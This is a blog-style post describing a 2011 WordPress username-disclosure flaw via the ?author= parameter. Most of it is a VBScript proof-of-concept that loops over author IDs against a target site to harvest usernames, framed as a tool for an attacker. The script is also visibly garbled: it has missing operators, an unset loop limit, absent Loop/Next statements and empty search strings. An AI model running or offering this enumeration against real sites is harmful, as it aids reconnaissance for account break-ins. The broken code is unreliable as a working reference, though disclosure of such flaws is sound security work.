WordPress UserId & Username Enumeration Exploit/PoC Script
Simple VBScript using XMLHTTP to fetch usernames from a WordPress installation using the ?author=
redirect feature.
On 26th May 2011, a relatively easy to detect and exploit vulnerability was found with WordPress. The issue being with WordPress disclosing usernames based on a simple URL parameter and the consequent page redirect/HTTP status. Although WordPress has implemented usernames in the title bar as a feature, this can be abused easily by recursively supplying a /?author=number
to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493
Even though there are a lot of scripts/exploits/PoC already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.
PoC using VBScript
'Author: karniv0re@null.co.in
'User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3
'This script allows an attacker to enumerate wordpress users by
'querying the value of the parameter 'author' using xmlHTTP.
Dim url, sQuery, args, i, max
if wscript.arguments.count < 1 then
wscript.echo "WPEnum – WordPress User Enumeration Script"
wscript.echo "Author: karniv0re@null.co.in"
wscript.echo "Insufficient Parameters."
wscript.echo "cscript WPEnum.vbs []"
wscript.echo ": A WordPress based website in the form of http://example.com/"
wscript.echo ":[Optional] Maximum number of users. Default 20."
wscript.echo "Example: cscript WPEnum.vbs http://example.com/ 10"
End if
set args = wscript.Arguments
wscript.echo "WPEnum – WordPress User Enumeration Script"
wscript.echo "Author: karniv0re@null.co.in"
wscript.echo "Enumerating ..."
url = args(0)
if right(url,1) "/" then
url = url & "/"
End if
if wscript.arguments.count = 2 AND IsNumeric(args(1)) then
End if
Set xmlHTTP = Nothing
set xmlHTTP = CreateObject("Microsoft.XmlHttp")
For i=1 to max
sQuery = args(0) & "?author=" & i
xmlHTTP.open "GET", sQuery, false
xmlHTTP.send ""
wscript.sleep 70
do while not xmlHTTP.readyState=4
if xmlHTTP.status = 404 then
wscript.echo i & " users enumerated."
wscript.echo "Done!"
Set xmlHTTP = Nothing
wscript. quit
End if
wscript.echo "Userid:" & i
k = Instr(Lcase(xmlHTTP.responseText),"")
j = Instr(Lcase(xmlHTTP.responseText),"")
username = Mid(xmlHTTP.responseText, k+7, j-k-7)
wscript.echo username
wscript.echo i & " users enumerated."
wscript.echo "Done!"
Set xmlHTTP = Nothing
'End of program